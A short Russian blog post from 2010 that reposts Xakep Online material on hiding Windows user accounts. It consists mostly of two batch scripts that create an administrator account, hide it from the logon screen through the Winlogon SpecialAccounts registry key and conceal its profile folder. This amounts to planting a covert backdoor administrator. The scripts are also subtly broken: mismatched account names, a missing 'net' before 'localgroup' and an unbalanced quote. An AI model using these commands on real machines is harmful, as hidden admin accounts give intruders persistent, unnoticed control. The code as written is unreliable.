пятница, 29 января 2010 г.

Xakep Online -> Невидимые пользователи Windows

Xakep Online -> Невидимые пользователи Windows: "Еще один способ создать 'невидимого' пользователя в Windows:

net user user password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo 'user'=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
attrib +r +a +s +h %SystemDrive%\docume~1\user
Exit

Или так (без .reg файла):

net user hiddenuser hidden /add && localgroup administrators hiddenuser /add
reg add 'hklm\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist /v hiddenuser /t reg_dword /d 0 /f
if exist '\documents and settings\hiddenuser' attrib +s +r +h '\documents and settings\hiddenuser'
exit

Однако, в данном случае это не уязвимость, а правильная работа системы - ведь пользователи из группы Special Accounts не отображаются при логоне в систему или в Панели Управления. В первом же случае налицо неправильное функционирование - пользователь не входит в группу Special Accounts, но тем не менее не показывается в списке юзеров."

Комментариев нет: